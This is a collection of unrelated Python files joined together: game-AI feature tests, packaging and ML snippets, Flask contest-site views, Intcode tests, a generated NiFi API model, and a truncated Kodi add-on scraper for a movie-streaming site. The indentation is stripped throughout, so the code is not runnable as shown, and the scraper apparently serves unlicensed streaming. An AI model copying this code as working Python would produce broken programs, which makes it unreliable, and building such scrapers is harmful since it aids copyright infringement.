def test_camera_width_world_units_are_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
camera_width_world_units=77)
self.assertEqual(agent_interface_format.camera_width_world_units, 77)
def test_use_feature_units_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
use_feature_units=True)
self.assertEqual(agent_interface_format.use_feature_units, True)
class FeaturesTest(absltest.TestCase):
def testFunctionsIdsAreConsistent(self):
for i, f in enumerate(actions.FUNCTIONS):
self.assertEqual(i, f.id, "id doesn't match for %s" % f.id)
def testAllVersionsOfAnAbilityHaveTheSameGeneral(self):
for ability_id, funcs in six.iteritems(actions.ABILITY_IDS):
self.assertLen({f.general_id for f in funcs}, 1,
"Multiple generals for %s" % ability_id)
def testValidFunctionsAreConsistent(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
valid_funcs = feats.action_spec()
for func_def in valid_funcs.functions:
func = actions.FUNCTIONS[func_def.id]
self.assertEqual(func_def.id, func.id)
self.assertEqual(func_def.name, func.name)
self.assertEqual(len(func_def.args), len(func.args)) # pylint: disable=g-generic-assert
def gen_random_function_call(self, action_spec, func_id):
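    # Build a FunctionCall for `func_id` with a uniformly random, in-range value for each argument.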
args = [[numpy.random.randint(0, size) for size in arg.sizes] # pylint: disable=g-complex-comprehension
for arg in action_spec.functions[func_id].args]
return actions.FunctionCall(func_id, args)
def testIdsMatchIndex(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
action_spec = feats.action_spec()
for func_index, func_def in enumerate(action_spec.functions):
self.assertEqual(func_index, func_def.id)
for type_index, type_def in enumerate(action_spec.types):
self.assertEqual(type_index, type_def.id)
def testReversingUnknownAction(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=False))
sc2_action = sc_pb.Action()
sc2_action.action_feature_layer.unit_command.ability_id = 6 # Cheer
func_call = feats.reverse_action(sc2_action)
self.assertEqual(func_call.function, 0) # No-op
def testSpecificActionsAreReversible(self):
"""Test that the `transform_action` and `reverse_action` are inverses."""
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=False))
action_spec = feats.action_spec()
for func_def in action_spec.functions:
for _ in range(10):
func_call = self.gen_random_function_call(action_spec, func_def.id)
sc2_action = feats.transform_action(
None, func_call, skip_available=True)
func_call2 = feats.reverse_action(sc2_action)
sc2_action2 = feats.transform_action(
None, func_call2, skip_available=True)
if func_def.id == actions.FUNCTIONS.select_rect.id:
# Need to check this one manually since the same rect can be
# defined in multiple ways.
def rect(a):
return point.Rect(point.Point(*a[1]).floor(),
point.Point(*a[2]).floor())
self.assertEqual(func_call.function, func_call2.function)
self.assertEqual(len(func_call.arguments), len(func_call2.arguments)) # pylint: disable=g-generic-assert
self.assertEqual(func_call.arguments[0], func_call2.arguments[0])
self.assertEqual(rect(func_call.arguments),
rect(func_call2.arguments))
else:
self.assertEqual(func_call, func_call2, msg=sc2_action)
self.assertEqual(sc2_action, sc2_action2)
def testRawActionUnitTags(self):
feats = features.Features(
features.AgentInterfaceFormat(
use_raw_units=True,
action_space=actions.ActionSpace.RAW),
map_size=point.Point(100, 100))
tags = [numpy.random.randint(2**20, 2**24) for _ in range(10)]
ntags = numpy.array(tags, dtype=numpy.int64)
tag = tags[0]
ntag = numpy.array(tag, dtype=numpy.int64)
def transform(fn, *args):
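      # Build a raw FunctionCall and return the unit_command proto it is transformed into.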
func_call = actions.RAW_FUNCTIONS[fn]("now", *args)
proto = feats.transform_action(None, func_call, skip_available=True)
return proto.action_raw.unit_command
self.assertEqual(transform("Attack_pt", tag, [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", ntag, [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", [tag], [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", [ntag], [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", tags, [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_pt", ntags, [15, 20]).unit_tags, tags)
# Weird, but needed for backwards compatibility
self.assertEqual(transform("Attack_pt", [tags], [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_pt", [ntags], [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_unit", tag, tag).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, ntag).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, [tag]).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, [ntag]).target_unit_tag, tag)
def testCanPickleSpecs(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=SQUARE_DIMENSIONS))
action_spec = feats.action_spec()
observation_spec = feats.observation_spec()
self.assertEqual(action_spec, pickle.loads(pickle.dumps(action_spec)))
self.assertEqual(observation_spec,
pickle.loads(pickle.dumps(observation_spec)))
def testCanPickleFunctionCall(self):
func = actions.FUNCTIONS.select_point("select", [1, 2])
self.assertEqual(func, pickle.loads(pickle.dumps(func)))
def testCanDeepcopyNumpyFunctionCall(self):
arguments = [numpy.float32] * len(actions.Arguments._fields)
dtypes = actions.FunctionCall(
function=numpy.float32,
arguments=actions.Arguments(*arguments))
self.assertEqual(dtypes, copy.deepcopy(dtypes))
def testSizeConstructors(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=SQUARE_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 84))
self.assertEqual(spec.types.screen2.sizes, (84, 84))
self.assertEqual(spec.types.minimap.sizes, (64, 64))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
# Missing one or the other of game_info and dimensions.
with self.assertRaises(ValueError):
features.Features()
# Resolution/action space mismatch.
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
action_space=actions.ActionSpace.RGB))
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
rgb_dimensions=RECTANGULAR_DIMENSIONS,
action_space=actions.ActionSpace.FEATURES))
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=RECTANGULAR_DIMENSIONS))
def testFlRgbActionSpec(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.FEATURES))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.RGB))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (128, 132))
self.assertEqual(spec.types.screen2.sizes, (128, 132))
self.assertEqual(spec.types.minimap.sizes, (74, 77))
def testFlRgbObservationSpec(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.FEATURES))
obs_spec = feats.observation_spec()
self.assertEqual(obs_spec["feature_screen"], # pylint: disable=g-generic-assert
(len(features.SCREEN_FEATURES), 80, 84))
self.assertEqual(obs_spec["feature_minimap"], # pylint: disable=g-generic-assert
(len(features.MINIMAP_FEATURES), 67, 64))
self.assertEqual(obs_spec["rgb_screen"], (132, 128, 3))
self.assertEqual(obs_spec["rgb_minimap"], (77, 74, 3))
if __name__ == "__main__":
absltest.main()
|
import os
from glob import glob
from setuptools import setup, find_packages
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
def recursive_include(module):
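    # Glob every file under the module's directory and return the paths relative to it (for package_data).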
module_path = module.replace(".", "/") + "/"
files = glob(f"{module_path}**", recursive=True)
return [file.replace(module_path, "") for file in files]
setup(
name="kivy-ios",
version="1.3.0.dev0",
description="Kivy for iOS",
long_description=read("README.md"),
long_description_content_type="text/markdown",
author="The Kivy team",
author_email="kivy-dev@googlegroups.com",
url="https://github.com/kivy/kivy-ios",
python_requires=">=3.6.0",
install_requires=["cookiecutter", "pbxproj", "Pillow", "requests", "sh"],
packages=find_packages(),
package_data={
        # Note: this method is a bit excessive, as it includes absolutely everything.
        # Make sure you run it from a clean directory.
"kivy_ios": recursive_include("kivy_ios"),
},
entry_points={"console_scripts": ["toolchain = kivy_ios.toolchain:main"]},
)
|
from __future__ import unicode_literals
class SRPException(Exception):
"""Base srptools exception class."""
|
import plac
import numpy
import torch
from torch import autograd
from torch import nn
import torch.optim
import torch.cuda
from thinc.neural.ops import CupyOps
from thinc.extra.wrappers import PyTorchWrapper
from thinc.v2v import Model
def main(length=1000, nO=32, nI=32):
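    # Wrap a PyTorch Linear layer with thinc's PyTorchWrapper and run a few forward/backward passes (on GPU if cupy is available).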
    if CupyOps.xp is not None:
print("Use GPU")
Model.ops = CupyOps()
Model.Ops = CupyOps
torch.set_default_tensor_type('torch.cuda.FloatTensor')
pt_model = nn.Linear(nI, nO)
optimizer = torch.optim.Adam(pt_model.parameters())
model = PyTorchWrapper(pt_model)
X = Model.ops.xp.ones((length, nI), dtype='f')
y = 1. / X
for i in range(10):
yh, get_dX = model.begin_update(X)
dY = (yh - y) / len(y)
dX = get_dX(dY)
if __name__ == '__main__':
plac.call(main)
|
from flask import render_template, g, request, url_for, jsonify, redirect
from flask_login import current_user, login_required
import flask_menu as menu
from sqlalchemy import desc, asc
from app import app, lm
from app.user.models import User, UserJoin
from app.contest.models import Contest
from app.submission.models import Submission
from app.problem.models import Problem
from app.common.tasks import run_code
from app.common.utils import generate_random_string
from app.problem import constants as PROBLEM
@app.before_request
def before_request():
g.user = current_user
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.route('/')
@app.route('/index')
@login_required
@menu.register_menu(app, '.index', 'Home', order=0)
def index():
contest = Contest.query.order_by(Contest.id.desc()).first()
problems = []
if contest:
problems = contest.problems.order_by(Problem.rank.asc()).all()
return render_template(
'index.html',
contest=contest,
problems=problems
)
@app.route('/')
@app.route('/scoreboard')
def scoreboard():
contest = Contest.query.order_by(Contest.id.desc()).first()
if not contest:
return redirect(url_for('index'))
activities = Submission.query.order_by(desc(Submission.created_at)).all()
joins = UserJoin.query.filter_by(contest_id=contest.id).all()
raw = []
for join in joins:
raw.append((join.user, join.user.get_total_score()))
return render_template(
'scoreboard.html',
activities=activities,
raw=raw
)
@app.route('/howto')
@menu.register_menu(app, '.howto', 'How to', order=2)
def howto():
return render_template('howto.html')
@app.route('/admin')
def admin():
contests = Contest.query.order_by(Contest.id.desc()).all()
return render_template(
'admin.html',
contests=contests
)
@app.route('/activities/more', methods=['POST'])
def more_activities():
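    # Return up to two activity-feed entries for submissions with id >= the last seen id, alternating left/right placement, plus every participant's current total score.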
last_side = request.form.get('side', 'left')
last_id = request.form.get('id')
activities = Submission.query.filter(Submission.id >= last_id).order_by(desc(Submission.created_at)).limit(2).all()
resp = []
for activity in activities:
last_side = 'right' if last_side == 'left' else 'left'
element = {
'class': 'pos-%s clearfix' % last_side,
'id': activity.id,
'time': activity.created_at.strftime('%b %d %H:%M'),
'header': u"%s" % activity.user.email
}
element['result'] = u'/static/images/running.gif'
if activity.problem.category == PROBLEM.CATEGORY_CODE:
if int(activity.id) == int(last_id):
element['type'] = 'update'
else:
element['type'] = 'new'
if activity.is_finished():
if activity.is_accepted():
element['footer'] = u' solved <a href="{0:s}">{1:s}</a> and scored <strong>{2:s} points</strong>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en, str(activity.received_point))
element['result'] = u'/static/images/true.png'
else:
element['footer'] = u' failed to solve <a href="{0:s}">{1:s}</a>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en)
element['result'] = u'/static/images/false.png'
else:
element['footer'] = u' submitted solution for <a href="{0:s}">{1:s}</a>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en)
else:
element['type'] = 'update'
element['result'] = u'/static/images/true.png'
if int(activity.id) != int(last_id):
element['type'] = 'new'
element['footer'] = u' solved <a href="{0:s}">{1:s}</a> and scored <strong>{2:s} points</strong>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en, str(activity.received_point))
resp.append(element)
contest = Contest.query.order_by(Contest.id.desc()).first()
joins = UserJoin.query.filter_by(contest_id=contest.id).all()
for join in joins:
resp.append({
'type': 'point',
'user_id': join.user.id,
'point': join.user.get_total_score()
})
return jsonify(result=resp)
|
from aoc.day_02 import IntcodeComputer
def _run_test(program, expected):
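    # Run the program to completion and compare the final memory against the expected comma-separated state.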
computer = IntcodeComputer(program).execute()
assert ",".join(str(x) for x in computer.memory) == expected
def test_input(monkeypatch):
monkeypatch.setattr("builtins.input", lambda: "1")
program = "3,0,99"
expected = "1,0,99"
_run_test(program, expected)
def test_output(capfd):
program = "4,0,99"
IntcodeComputer(program).execute()
captured = capfd.readouterr()
assert captured.out == "4\n"
def test_ex01():
program = "1002,4,3,4,33"
expected = "1002,4,3,4,99"
_run_test(program, expected)
def _test_in_out(comp, in_val, out_val, monkeypatch, capfd):
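    # Feed `in_val` as the program's input and assert that it prints `out_val`.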
monkeypatch.setattr("builtins.input", lambda: in_val)
comp.execute()
captured = capfd.readouterr()
assert captured.out == f"{out_val}\n"
def test_ex02(monkeypatch, capfd):
program = "3,9,8,9,10,9,4,9,99,-1,8"
comp = IntcodeComputer(program)
_test_in_out(comp, 8, 1, monkeypatch, capfd)
_test_in_out(comp, 1, 0, monkeypatch, capfd)
def test_ex03(monkeypatch, capfd):
program = "3,9,7,9,10,9,4,9,99,-1,8"
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 1, monkeypatch, capfd)
_test_in_out(comp, 9, 0, monkeypatch, capfd)
def test_ex04(monkeypatch, capfd):
program = "3,3,1108,-1,8,3,4,3,99"
comp = IntcodeComputer(program)
_test_in_out(comp, 8, 1, monkeypatch, capfd)
_test_in_out(comp, 1, 0, monkeypatch, capfd)
def test_ex05(monkeypatch, capfd):
program = "3,3,1107,-1,8,3,4,3,99"
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 1, monkeypatch, capfd)
_test_in_out(comp, 8, 0, monkeypatch, capfd)
def test_ex06(monkeypatch, capfd):
program = "3,12,6,12,15,1,13,14,13,4,13,99,-1,0,1,9"
comp = IntcodeComputer(program)
_test_in_out(comp, 0, 0, monkeypatch, capfd)
_test_in_out(comp, 1, 1, monkeypatch, capfd)
def test_ex07(monkeypatch, capfd):
program = "3,3,1105,-1,9,1101,0,0,12,4,12,99,1"
comp = IntcodeComputer(program)
_test_in_out(comp, 0, 0, monkeypatch, capfd)
_test_in_out(comp, 1, 1, monkeypatch, capfd)
def test_ex08(monkeypatch, capfd):
program = (
"3,21,1008,21,8,20,1005,20,22,107,8,21,20,1006,20,31,"
"1106,0,36,98,0,0,1002,21,125,20,4,20,1105,1,46,104,"
"999,1105,1,46,1101,1000,1,20,4,20,1105,1,46,98,99"
)
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 999, monkeypatch, capfd)
_test_in_out(comp, 8, 1000, monkeypatch, capfd)
_test_in_out(comp, 9, 1001, monkeypatch, capfd)
|
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.10.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ControllerStatusDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'active_thread_count': 'int',
'terminated_thread_count': 'int',
'queued': 'str',
'flow_files_queued': 'int',
'bytes_queued': 'int',
'running_count': 'int',
'stopped_count': 'int',
'invalid_count': 'int',
'disabled_count': 'int',
'active_remote_port_count': 'int',
'inactive_remote_port_count': 'int',
'up_to_date_count': 'int',
'locally_modified_count': 'int',
'stale_count': 'int',
'locally_modified_and_stale_count': 'int',
'sync_failure_count': 'int'
}
attribute_map = {
'active_thread_count': 'activeThreadCount',
'terminated_thread_count': 'terminatedThreadCount',
'queued': 'queued',
'flow_files_queued': 'flowFilesQueued',
'bytes_queued': 'bytesQueued',
'running_count': 'runningCount',
'stopped_count': 'stoppedCount',
'invalid_count': 'invalidCount',
'disabled_count': 'disabledCount',
'active_remote_port_count': 'activeRemotePortCount',
'inactive_remote_port_count': 'inactiveRemotePortCount',
'up_to_date_count': 'upToDateCount',
'locally_modified_count': 'locallyModifiedCount',
'stale_count': 'staleCount',
'locally_modified_and_stale_count': 'locallyModifiedAndStaleCount',
'sync_failure_count': 'syncFailureCount'
}
def __init__(self, active_thread_count=None, terminated_thread_count=None, queued=None, flow_files_queued=None, bytes_queued=None, running_count=None, stopped_count=None, invalid_count=None, disabled_count=None, active_remote_port_count=None, inactive_remote_port_count=None, up_to_date_count=None, locally_modified_count=None, stale_count=None, locally_modified_and_stale_count=None, sync_failure_count=None):
"""
ControllerStatusDTO - a model defined in Swagger
"""
self._active_thread_count = None
self._terminated_thread_count = None
self._queued = None
self._flow_files_queued = None
self._bytes_queued = None
self._running_count = None
self._stopped_count = None
self._invalid_count = None
self._disabled_count = None
self._active_remote_port_count = None
self._inactive_remote_port_count = None
self._up_to_date_count = None
self._locally_modified_count = None
self._stale_count = None
self._locally_modified_and_stale_count = None
self._sync_failure_count = None
if active_thread_count is not None:
self.active_thread_count = active_thread_count
if terminated_thread_count is not None:
self.terminated_thread_count = terminated_thread_count
if queued is not None:
self.queued = queued
if flow_files_queued is not None:
self.flow_files_queued = flow_files_queued
if bytes_queued is not None:
self.bytes_queued = bytes_queued
if running_count is not None:
self.running_count = running_count
if stopped_count is not None:
self.stopped_count = stopped_count
if invalid_count is not None:
self.invalid_count = invalid_count
if disabled_count is not None:
self.disabled_count = disabled_count
if active_remote_port_count is not None:
self.active_remote_port_count = active_remote_port_count
if inactive_remote_port_count is not None:
self.inactive_remote_port_count = inactive_remote_port_count
if up_to_date_count is not None:
self.up_to_date_count = up_to_date_count
if locally_modified_count is not None:
self.locally_modified_count = locally_modified_count
if stale_count is not None:
self.stale_count = stale_count
if locally_modified_and_stale_count is not None:
self.locally_modified_and_stale_count = locally_modified_and_stale_count
if sync_failure_count is not None:
self.sync_failure_count = sync_failure_count
@property
def active_thread_count(self):
"""
Gets the active_thread_count of this ControllerStatusDTO.
The number of active threads in the NiFi.
:return: The active_thread_count of this ControllerStatusDTO.
:rtype: int
"""
return self._active_thread_count
@active_thread_count.setter
def active_thread_count(self, active_thread_count):
"""
Sets the active_thread_count of this ControllerStatusDTO.
The number of active threads in the NiFi.
:param active_thread_count: The active_thread_count of this ControllerStatusDTO.
:type: int
"""
self._active_thread_count = active_thread_count
@property
def terminated_thread_count(self):
"""
Gets the terminated_thread_count of this ControllerStatusDTO.
The number of terminated threads in the NiFi.
:return: The terminated_thread_count of this ControllerStatusDTO.
:rtype: int
"""
return self._terminated_thread_count
@terminated_thread_count.setter
def terminated_thread_count(self, terminated_thread_count):
"""
Sets the terminated_thread_count of this ControllerStatusDTO.
The number of terminated threads in the NiFi.
:param terminated_thread_count: The terminated_thread_count of this ControllerStatusDTO.
:type: int
"""
self._terminated_thread_count = terminated_thread_count
@property
def queued(self):
"""
Gets the queued of this ControllerStatusDTO.
The number of flowfiles queued in the NiFi.
:return: The queued of this ControllerStatusDTO.
:rtype: str
"""
return self._queued
@queued.setter
def queued(self, queued):
"""
Sets the queued of this ControllerStatusDTO.
The number of flowfiles queued in the NiFi.
:param queued: The queued of this ControllerStatusDTO.
:type: str
"""
self._queued = queued
@property
def flow_files_queued(self):
"""
Gets the flow_files_queued of this ControllerStatusDTO.
The number of FlowFiles queued across the entire flow
:return: The flow_files_queued of this ControllerStatusDTO.
:rtype: int
"""
return self._flow_files_queued
@flow_files_queued.setter
def flow_files_queued(self, flow_files_queued):
"""
Sets the flow_files_queued of this ControllerStatusDTO.
The number of FlowFiles queued across the entire flow
:param flow_files_queued: The flow_files_queued of this ControllerStatusDTO.
:type: int
"""
self._flow_files_queued = flow_files_queued
@property
def bytes_queued(self):
"""
Gets the bytes_queued of this ControllerStatusDTO.
The size of the FlowFiles queued across the entire flow
:return: The bytes_queued of this ControllerStatusDTO.
:rtype: int
"""
return self._bytes_queued
@bytes_queued.setter
def bytes_queued(self, bytes_queued):
"""
Sets the bytes_queued of this ControllerStatusDTO.
The size of the FlowFiles queued across the entire flow
:param bytes_queued: The bytes_queued of this ControllerStatusDTO.
:type: int
"""
self._bytes_queued = bytes_queued
@property
def running_count(self):
"""
Gets the running_count of this ControllerStatusDTO.
The number of running components in the NiFi.
:return: The running_count of this ControllerStatusDTO.
:rtype: int
"""
return self._running_count
@running_count.setter
def running_count(self, running_count):
"""
Sets the running_count of this ControllerStatusDTO.
The number of running components in the NiFi.
:param running_count: The running_count of this ControllerStatusDTO.
:type: int
"""
self._running_count = running_count
@property
def stopped_count(self):
"""
Gets the stopped_count of this ControllerStatusDTO.
The number of stopped components in the NiFi.
:return: The stopped_count of this ControllerStatusDTO.
:rtype: int
"""
return self._stopped_count
@stopped_count.setter
def stopped_count(self, stopped_count):
"""
Sets the stopped_count of this ControllerStatusDTO.
The number of stopped components in the NiFi.
:param stopped_count: The stopped_count of this ControllerStatusDTO.
:type: int
"""
self._stopped_count = stopped_count
@property
def invalid_count(self):
"""
Gets the invalid_count of this ControllerStatusDTO.
The number of invalid components in the NiFi.
:return: The invalid_count of this ControllerStatusDTO.
:rtype: int
"""
return self._invalid_count
@invalid_count.setter
def invalid_count(self, invalid_count):
"""
Sets the invalid_count of this ControllerStatusDTO.
The number of invalid components in the NiFi.
:param invalid_count: The invalid_count of this ControllerStatusDTO.
:type: int
"""
self._invalid_count = invalid_count
@property
def disabled_count(self):
"""
Gets the disabled_count of this ControllerStatusDTO.
The number of disabled components in the NiFi.
:return: The disabled_count of this ControllerStatusDTO.
:rtype: int
"""
return self._disabled_count
@disabled_count.setter
def disabled_count(self, disabled_count):
"""
Sets the disabled_count of this ControllerStatusDTO.
The number of disabled components in the NiFi.
:param disabled_count: The disabled_count of this ControllerStatusDTO.
:type: int
"""
self._disabled_count = disabled_count
@property
def active_remote_port_count(self):
"""
Gets the active_remote_port_count of this ControllerStatusDTO.
The number of active remote ports in the NiFi.
:return: The active_remote_port_count of this ControllerStatusDTO.
:rtype: int
"""
return self._active_remote_port_count
@active_remote_port_count.setter
def active_remote_port_count(self, active_remote_port_count):
"""
Sets the active_remote_port_count of this ControllerStatusDTO.
The number of active remote ports in the NiFi.
:param active_remote_port_count: The active_remote_port_count of this ControllerStatusDTO.
:type: int
"""
self._active_remote_port_count = active_remote_port_count
@property
def inactive_remote_port_count(self):
"""
Gets the inactive_remote_port_count of this ControllerStatusDTO.
The number of inactive remote ports in the NiFi.
:return: The inactive_remote_port_count of this ControllerStatusDTO.
:rtype: int
"""
return self._inactive_remote_port_count
@inactive_remote_port_count.setter
def inactive_remote_port_count(self, inactive_remote_port_count):
"""
Sets the inactive_remote_port_count of this ControllerStatusDTO.
The number of inactive remote ports in the NiFi.
:param inactive_remote_port_count: The inactive_remote_port_count of this ControllerStatusDTO.
:type: int
"""
self._inactive_remote_port_count = inactive_remote_port_count
@property
def up_to_date_count(self):
"""
Gets the up_to_date_count of this ControllerStatusDTO.
The number of up to date versioned process groups in the NiFi.
:return: The up_to_date_count of this ControllerStatusDTO.
:rtype: int
"""
return self._up_to_date_count
@up_to_date_count.setter
def up_to_date_count(self, up_to_date_count):
"""
Sets the up_to_date_count of this ControllerStatusDTO.
The number of up to date versioned process groups in the NiFi.
:param up_to_date_count: The up_to_date_count of this ControllerStatusDTO.
:type: int
"""
self._up_to_date_count = up_to_date_count
@property
def locally_modified_count(self):
"""
Gets the locally_modified_count of this ControllerStatusDTO.
The number of locally modified versioned process groups in the NiFi.
:return: The locally_modified_count of this ControllerStatusDTO.
:rtype: int
"""
return self._locally_modified_count
@locally_modified_count.setter
def locally_modified_count(self, locally_modified_count):
"""
Sets the locally_modified_count of this ControllerStatusDTO.
The number of locally modified versioned process groups in the NiFi.
:param locally_modified_count: The locally_modified_count of this ControllerStatusDTO.
:type: int
"""
self._locally_modified_count = locally_modified_count
@property
def stale_count(self):
"""
Gets the stale_count of this ControllerStatusDTO.
The number of stale versioned process groups in the NiFi.
:return: The stale_count of this ControllerStatusDTO.
:rtype: int
"""
return self._stale_count
@stale_count.setter
def stale_count(self, stale_count):
"""
Sets the stale_count of this ControllerStatusDTO.
The number of stale versioned process groups in the NiFi.
:param stale_count: The stale_count of this ControllerStatusDTO.
:type: int
"""
self._stale_count = stale_count
@property
def locally_modified_and_stale_count(self):
"""
Gets the locally_modified_and_stale_count of this ControllerStatusDTO.
The number of locally modified and stale versioned process groups in the NiFi.
:return: The locally_modified_and_stale_count of this ControllerStatusDTO.
:rtype: int
"""
return self._locally_modified_and_stale_count
@locally_modified_and_stale_count.setter
def locally_modified_and_stale_count(self, locally_modified_and_stale_count):
"""
Sets the locally_modified_and_stale_count of this ControllerStatusDTO.
The number of locally modified and stale versioned process groups in the NiFi.
:param locally_modified_and_stale_count: The locally_modified_and_stale_count of this ControllerStatusDTO.
:type: int
"""
self._locally_modified_and_stale_count = locally_modified_and_stale_count
@property
def sync_failure_count(self):
"""
Gets the sync_failure_count of this ControllerStatusDTO.
The number of versioned process groups in the NiFi that are unable to sync to a registry.
:return: The sync_failure_count of this ControllerStatusDTO.
:rtype: int
"""
return self._sync_failure_count
@sync_failure_count.setter
def sync_failure_count(self, sync_failure_count):
"""
Sets the sync_failure_count of this ControllerStatusDTO.
The number of versioned process groups in the NiFi that are unable to sync to a registry.
:param sync_failure_count: The sync_failure_count of this ControllerStatusDTO.
:type: int
"""
self._sync_failure_count = sync_failure_count
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, ControllerStatusDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
# -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import directstream
class source:
def __init__(self):
self.domains = ['m4ufree.info']
self.base_link = 'http://m4ufree.info'
self.include_link = '/include/autocomplete.php?q='
self.search_link = '/tag/%s'
def movie(self, imdb, title, year):
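        # Build a tag-search URL from the title, scrape the matching entries, and return the relative URL whose title and year match.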
try:
t = cleantitle.get(title)
#r = cache.get(self.mfree_mvcache, 170)
#r = [i for i in r if t == i[0] and year == i[1]][0]
q = (title.translate(None, '\/:*?"\'<>|!,')).replace(' ', '-').replace('--', '-').lower()
q = urlparse.urljoin(self.base_link, self.search_link % q)
r = client.request(q)
r = zip(client.parseDOM(r, 'a', ret='href', attrs = {'class': 'top-item'}), client.parseDOM(r, 'a', attrs = {'class': 'top-item'}))
r = [(i[0], re.sub('^Watch\s*|<.+?>|</.+?>', '', i[1])) for i in r]
r = [(i[0], re.findall('(.+?) (?:\(|)(\d{4})(?:\)|)$', i[1])) for i in r]
r = [(i[0], i[1][0][0], i[1][0][1]) for i in r if len(i[1]) > 0]
r = [i[0] for i in r if t == cleantitle.get(i[1]) and year == i[2]][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def mfree_mvcache(self):
try:
